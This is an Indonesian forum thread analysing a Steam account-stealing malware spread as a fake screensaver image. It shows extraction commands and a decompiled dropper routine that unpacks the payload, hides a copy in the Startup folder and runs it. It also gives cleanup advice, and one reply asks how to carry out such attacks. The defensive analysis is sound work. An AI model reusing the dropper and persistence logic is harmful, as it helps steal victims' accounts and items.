RNDC [RNDC] Analisis Singkat Malware Steam Stealer

Discussion in 'N3 Source Codes dan Tutorials' started by dono, Nov 21, 2014.

Discuss [RNDC] Analisis Singkat Malware Steam Stealer in the N3 Source Codes dan Tutorials area at Nyit-Nyit.Net

  1. dono 3 SMP STAFF N3 Tukang Sapu

    Messages:
    2,403
    Likes Received:
    2,573
    Trophy Points:
    141
    Game:
    Dota 2
    Region:
    Australia
    Tutorial ini merupakan analisis singkat terhadap malware yang menyamar sebagai screensaver dan memanfaatkan fitur chat pada Steam untuk menyebar dan melakukan transfer item dari akun Steam milik korban ke akun Steam milik pembuat malware tersebut. Berdasarkan analisis singkat, diperoleh informasi bahwa malware tersebut dibuat menggunakan visual basic dotnet dan diproteksi menggunakan dotnet reactor.

    Jika kamu sering main DOTA2, CS:GO dan game lainnya yang memakai steam account, silahkan lebih hati-hati. Malware ini akan men-transfer / trade semua item kamu kepada account yang akan dijelaskan dibawah ini dan mengirimkan link bervirus tersebut kepada semua friendlist kamu.

    Banyak kejadian seperti screenshot dibawah ini yang sering kamu temukan dan akan ditemukan dan mungkin belum tau supaya kamu tetap waspada :

    1779235_890529747626858_2524847238871667458_n.jpg

    tumblr_neuvnmBc861s9enoho1_400.png

    Sebenarnya isinya seperti berikut:

    111.jpg

    222.jpg

    Mari kita analisa:

    CARA PERTAMA


    Cara pertama yang akan digunakan adalah static analysis dan hanya mencakup proses dekripsi dan disassembly file yang ter-embed pada malware tersebut. Pada bagian ini, penulis menggunakan sistem operasi GNU/Linux.

    • URL tersebut akan mengarahkan pada file steam-image_047.scr dan berikut ini adalah hasil identifikasinya:
    Code:
    % file steam-image_047.scr
    steam-image_047.scr: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    
    • Gunakan strings untuk mencari printable string pada malware tersebut, makan pada bagian akhir akan terlihat baris yang cukup panjang di dalam atribut XML description:
    Code:
    % strings steam-image_047.scr
    ...snip...
    <description>\\1||eslaF||seY||exe.relaetSmaetS||pmeT||AAgXAswCR23D/7zP/ ... </description>
    
    • Bisa terlihat bahwa ada beberapa bagian yang dipisahkan oleh karakter ||. Jika ke-5 bagian awal pada baris tersebut dibalik maka akan menjadi kalimat yang mudah dibaca. Caranya adalah sebagai berikut:
    Code:
    % echo -n '\\1||eslaF||seY||exe.relaetSmaetS||pmeT' | rev
    Temp||SteamStealer.exe||Yes||False||1\
    
    • Dari sini, dapat ditarik kesimpulan sementara bahwa malware ini akan membaca atau menulis file yang bernama SteamStealer.exe pada direktori temporer (Temp). Adapun bagian ke-6 dari baris di atas, jika dibalik maka akan menghasilkan string yang di-encode menggunakan base64. Dan setelah di-decode maka hasilnya berupa file yang dikompres menggunakan gzip:
    Code:
    % file SteamStealer
    SteamStealer: gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT)
    
    • Selanjutnya, ubah nama filenya agar dapat diekstrak menggunakan gunzip:
    Code:
    % mv SteamStealer SteamStealer.gz && gunzip SteamStealer.gz
    
    • Periksa file yang telah diekstrak:
    Code:
    % file SteamStealer
    SteamStealer: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    
    • Langkah terakhir adalah menggunakan monodis (mono CIL disassembler) untuk melakukan disassembly:
    Code:
    % monodis SteamStealer | head -10
    .assembly extern mscorlib
    {
    .ver 2:0:0:0
    .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
    }
    .assembly extern System
    {
    .ver 2:0:0:0
    .publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
    }
    ...snip...
    
    • Langkah di atas dapat disingkat dengan menggunakan oneliner seperti ini:
    Code:
    % strings steam-image_047.scr | grep '<description>.*</description>' | sed 's/\(<description>\|<\/description>\)//g' | \
    cut -b 44- | rev | base64 -d | gunzip > SteamStealer.exe && monodis SteamStealer.exe
    
    • Anda juga dapat menggunakan disassembler/decompiler favorit Anda untuk proses dekompilasi/disassembly misalnya IDAPro.

    CARA KEDUA

    Cara kedua ini dilakukan pada sistem operasi Microsoft Windows di dalam virtual machine dan dengan bantuan beberapa perangkat lunak untuk reverse engineering diantaranya ILSpy dan .Net Tools. Perlu dicatat, aturan standard untuk melakukan analisis terhadap file yang berbahaya termasuk malware adalah dengan menggunakan virtual machine atau semacamnya dan sebisa mungkin tidak terhubung dengan jaringan.

    • Langkah pertama adalah melakukan scanning terhadap file steam-image_047.exe menggunakan protection_id, dan hasilnya adalah sebagai berikut:
    Code:
    -=[ ProtectionID v0.6.6.6 OCTOBER]=-
    (c) 2003-2014 CDKiLLER & TippeX
    Build 31/10/14-07:38:06
    Ready...
    Scanning -> C:\Documents and Settings\Administrator\My Documents\steam-image_047.exe
    File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 338432 (052A00h) Byte(s)
    Compilation TimeStamp : 0x54298F2A -> Mon 29th Sep 2014 16:56:10 (GMT)
    [File Heuristics] -> Flag #1 : 00000100000001001101000000110000 (0x0404D030)
    [Entrypoint Section Entropy] : 5.64 (section #0) ".text " | Size : 0xAEA4 (44708) byte(s)
    [DllCharacteristics] -> Flag : (0x8540) -> ASLR | DEP | NOSEH | TSA
    [SectionCount] 4 (0x4) | ImageSize 0x5A000 (368640) byte(s)
    [VersionInfo] Product Name : BSCInk
    [VersionInfo] Product Version : 1.0.0.0
    [VersionInfo] File Description : BSCInk
    [VersionInfo] File Version : 1.0.0.0
    [VersionInfo] Original FileName : MoInk.exe
    [VersionInfo] Internal Name : MoInk.exe
    [VersionInfo] Legal Copyrights : Copyright © 2014
    [Debug Info] (record 1 of 1) (file offset 0xB206)
    Characteristics : 0x0 | TimeDateStamp : 0x0 | MajorVer : 0 / MinorVer : 0 -> (0.0)
    Type : 2 (0x2) -> CodeView | Size : 0x22 (34)
    AddressOfRawData : 0xCE22 | PointerToRawData : 0xB222
    CvSig : 0x53445352 | SigGuid FF2F1F5F-95CB-4C07-A34C32D41359E1C3
    Age : 0x1 | Pdb : MoInk.pdb
    [!] [.net scan core] dotNetReactor detected!
    [CompilerDetect] -> .NET
    [.] .Net Info -> v 2.5 | x86 managed (/platform:x86) | Flags : 0x00000003 -> COMIMAGE_FLAGS_ILONLY | COMIMAGE_FLAGS_32BITREQUIRED |
    [.] Entrypoint (Token) : 0x06000002
    [.] MetaData RVA : 0x00007444 | Size : 0x00003676 (13942)
    [.] MetaData->Version 1.1 -> v2.0.50727
    [.] Flags : 0x0 | Streams : 0x7 (7) unusual (its usually 5)
    - Scan Took : 0.157 Second(s) [00000009Dh (157) tick(s)] [497 of 569 scan(s) done]
    
    • Dari hasil deteksi di atas, bisa terlihat bahwa malware tersebut diproteksi menggunakan dotNetReactor dan untuk mempermudah proses analisis, maka akan digunakan aplikasi PvLog DeObfuscator yang merupakan bagian dari .Net Tools. Jalankan PvLog DeObfuscator dan pada bagianAssembly to DeObfuscate isi dengan path ke file malware steam-image_047.exe dengan menekan tombol browse. Untuk bagian Target Directory akan diisi secara otomatis oleh PvLog DeObfuscator. Selanjutnya, centang bagian Run Static Constructors, DeObfuscate Names danDeObfuscate Public Names lalu tekan tombol Go maka hasil deobfuscate akan disimpan pada sub direktori Deobfuscated dan berikut ini adalah log yang ditampilkan:
    Code:
    PvLog .NET DeObfuscator v1.0.3736.28078
    
    C:\Documents and Settings\Administrator\My Documents\steam-image_047.exe
    Reading Streams
    Loading Metadata Tables
    Loading Names
    Processing String Entries
    Processing Member References
    Building Type Graph - MethodSemantics - NestedClass - Graph Root - PropertyMap - EventMap - Members - FieldRVAs
    Building Type Names
    Managed resources
    Loading Assembly by Reflection
    Calling static constructors
    Loading Method Bodies
    optimizing bodies
    Deobfuscation finished
    
    • Sebagai catatan, pada proses di atas akan muncul sebuah pesan bahwa malware steam-image_047.exe tersebut diproteksi menggunakan dotnet reactor yang belum diregistrasi. Anda cukup menekan tombol OK ketika pesan tersebut muncul.
    • Selanjutnya, jalankan aplikasi ILSpy dan buka file yang sudah di-deobfuscate pada sub direktori DeObfuscated, maka pada panel sebelah kiri di bagian tree view steam-image_047 dapat terlihat namespace MoInk. Pada bagian MoInk -> Class3 -> Method4 dapat terlihat proses yang kurang lebih sama dengan yang telah dijelaskan pada cara pertama di atas. Berikut ini adalah potongan kode Method4 tersebut:
    Code:
    // MoInk.Class3
    [MethodImpl(MethodImplOptions.NoInlining)]
    private static void Method4()
    {
    string text = File.ReadAllText(Process.GetCurrentProcess().MainModule.FileName);
    string text2 = "<description>";
    string text3 = "</description>";
    string expression = Class2.Method1(Class3.Method3(ref text, ref text2, ref text3));
    Class3.Field1 = Strings.Split(expression, "\\\\", -1, CompareMethod.Binary);
    for (int i = 0; i <= Class3.Field1.Length - 1; i++)
    {
    if (!string.IsNullOrEmpty(Class3.Field1[i]))
    {
    try
    {
    string[] array = Strings.Split(Class3.Field1[i], "||", -1, CompareMethod.Binary);
    string s = array[0];
    string text4 = Interaction.Environ(array[1]) + "\\" + array[2];
    string a = array[3];
    string a2 = array[4];
    int millisecondsTimeout = Convert.ToInt32(array[5]) * 1000;
    if (File.Exists(text4))
    {
    File.Delete(text4);
    }
    File.WriteAllBytes(text4, Class3.Method1(Convert.FromBase64String(s)));
    if (a2 == "True")
    {
    string text5 = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + array[2];
    if (File.Exists(text5))
    {
    File.Delete(text5);
    }
    File.Copy(text4, text5);
    File.SetAttributes(text5, FileAttributes.Hidden);
    }
    Thread.Sleep(millisecondsTimeout);
    if (a == "Yes")
    {
    Process.Start(text4);
    }
    }
    catch (Exception ex)
    {
    MessageBox.Show(ex.ToString());
    }
    }
    }
    Process.GetCurrentProcess().Kill();
    }
    
    • Dari sini, Anda dapat melanjutkan proses analisis dan mempelajari cara kerja malware tersebut dengan melihat hasil dekompilasi setiap method.
    Demi faktor keamanan, sebaiknya hindari mengunduh file yang mencurigakan dan kalaupun ingin mengunduh dan Anda tidak menggunakan antivirus, maka Anda dapat menggunakan layanan seperti virustotal untuk memeriksa file tersebut. Walaupun demikian, kadang ada faktor yang cukup sulit untuk ditanggulangi misalnya jika Anda adalah seorang yang bekerja sebagai HRD pada sebuah perusahaan maka kemungkinan besar Anda akan sering bertemu dengan attack vector yang lain misalnya melalui file yang tipenya adalah PDF. Maka dari itu Anda harus senantiasa waspada. Demikian tutorial singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan Yang Maha Esa, Maxindo, N3 dan Anda yang telah membaca tulisan singkat ini.

    Sumber : http://rndc.or.id/wiki/index.php?title=Analisis_Singkat_Malware_Steam_Stealer
    Analisis oleh drubizca FB: https://www.facebook.com/drubicza

    Referensi:
    http://en.wikipedia.org/wiki/List_of_CIL_instructions
    http://www.eziriz.com/dotnet_reactor.htm
    http://dotnetprotector.pvlog.com/Tools.aspx
    http://ilspy.net/
    http://pid.gamecopyworld.com/
     
    Last edited: Nov 21, 2014

    Gunakan jasa Rekber N3 untuk menjamin jual beli anda atau menghindari penipuan dengan meng klik disini
  2. dono 3 SMP STAFF N3 Tukang Sapu

    Messages:
    2,403
    Likes Received:
    2,573
    Trophy Points:
    141
    Game:
    Dota 2
    Region:
    Australia
    Ada juga jenis lain:

    Nama file: IMG_211102014_17274511.scr

    Kalau dibuka ada cewek cakep loh..

    2_256x256.png

    tapi setelah buka itu otomatis download file yang isinya secara tekhnikal seperti berikut:

    Code:
    Downloads and executes:
    temp.exe
    
    Meta-data
    =======================================================================
    File:    temp.exe
    Size:    4525568 bytes
    Type:    PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
    MD5:     d0f8b90c85e5bedb691fca5c571a6794
    SHA1:    cd9b3bf5c8d70e833b5c580c9b2fc1f3e5e4341e
    ssdeep:  98304:seRaRLOvFLHpNeV/riwz58R42is6e3RXjOWDucCnp1DA9sv7o2s2kbsUOEGx4VKm:zRaidjjqPdDsDbsU0akJyxL405+fiX
    Date:    0x5460F588 [Mon Nov 10 17:27:36 2014 UTC]
    EP:      0x8522b6 .text 0/3
    CRC:     Claimed: 0x0, Actual: 0x4564dd [SUSPICIOUS]
    
    Berikut vitot nya: https://www.virustotal.com/en/file/...335883cf80c053b827195f43/analysis/1416161305/

    Nah, kalau udah kena gimana ?
    1. Keluar dari steam sesegera mungkin
    2. Ctrl+Alt+Del buka Task Manager
    3. Matikan proses temp.exe, wrrrrrrrrrrrr.exe, vv.exe atau proses nama random contoh 340963.exe
    4. Scan dengan antivirus
    5. Kalau malware nya udah disinfected atau deleted, ganti password steam kamu segera juga password account kamu yang sama dengan password kamu sebelumnya.
    6. Check apakah ada item kamu yang hilang ? Jika tidak reinstall aja steam nya biar aman.

    Langkah untuk menghindari:
    1. Jangan membuka link aneh dari temana tau orang yang kamu tidak kenal, ataupun link dari orang yang kamu kenal yang tidak meberitahu link apa itu
    2. Jika kamu buka gambar lalu mendadak minta permisi untuk menjalankan sebuah program, waspadalah!
    3. Ikuti tutorial dari steam dari link berikut ini: https://support.steampowered.com/kb_article.php?ref=1266-OAFV-8478
     
    Last edited: Nov 21, 2014
  3. k4bayan 1 SMP Level 2

    Messages:
    1,224
    Likes Received:
    110
    Trophy Points:
    90
    Game:
    Dota 2
    Region:
    Bandung
    sudah 4 user kena dampak di net sini ": selain gambar di atas ada juga pict blinkdager abal abal.. :)
     
  4. prant Pra TK Level 1

    Messages:
    10
    Likes Received:
    0
    Trophy Points:
    26
    mohon maaf om
    sekedar pengen tau
    trus bagai mana cara nya agar kita menjadi pelaku kejahatan tersebut
    terutama menggunakan cara diatas om
    mohon maaf kalau noob and oot
     
  5. Curseddraw Pra TK Level 1

    Messages:
    11
    Likes Received:
    0
    Trophy Points:
    26
    Region:
    DKI Jakarta
    mau nanya oom kalo temen ane udah ada yang kena invent nya ilang di csgo sama dota nya

    tuh ada kemungkinan di balikin ga sama steam ?

    kasusnya org ga jelas add friend dia, tau2 pass off online lagi inventory dah bolong2

    dan steam nya mesti di install ulang ?

    maaf kalo oot
     
  6. ferdinandt22 Belum Sekolah Level 0

    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Game:
    RF
    Region:
    Medan
  7. westcoastcustoms Pra TK Level 1

    Messages:
    38
    Likes Received:
    6
    Trophy Points:
    37
    nice thread...

    dulu sering banget entah temen atau stranger ngasih link gambar di chat steam... pas saya buka ehhh kaspersky detek kalo itu malware..

    langsung aja saya maki2 tuh temen saya yg ngirim link gambar gituan,, ehh sampai sekarang gk pernah ngirim2 kaya begitu lg
     
  8. ariyahandara TK 0 Besar Level 1

    Messages:
    113
    Likes Received:
    27
    Trophy Points:
    57
    Game:
    Tidak Ada
    Region:
    Tasikmalaya
    wah wah wah pantas item item saya banyak yang menghilang, ternyata itu penyebab nya,, hadeuh.
    makaih @TS infonya...
     
  9. gedebag Belum Sekolah Level 1

    Messages:
    2
    Likes Received:
    1
    Trophy Points:
    26
    Game:
    Audition Ayo Dance
    Region:
    DKI Jakarta

    secara teknikal steam tidak akan bertanggung jawab atas kehilangan item player

    CMIIW
     
    ariyahandara likes this.
  10. agualloc Pra TK Level 1

    Messages:
    25
    Likes Received:
    7
    Trophy Points:
    28
    Kalo dari pihak steam tentu gak bisa disalahkan, karena murni kesalahan user nya.
    tapi sebagian besar antivirus sudah detect malwarenya kok.
    kecuali kalo maen di warnet yang off av nya.
     

Share This Page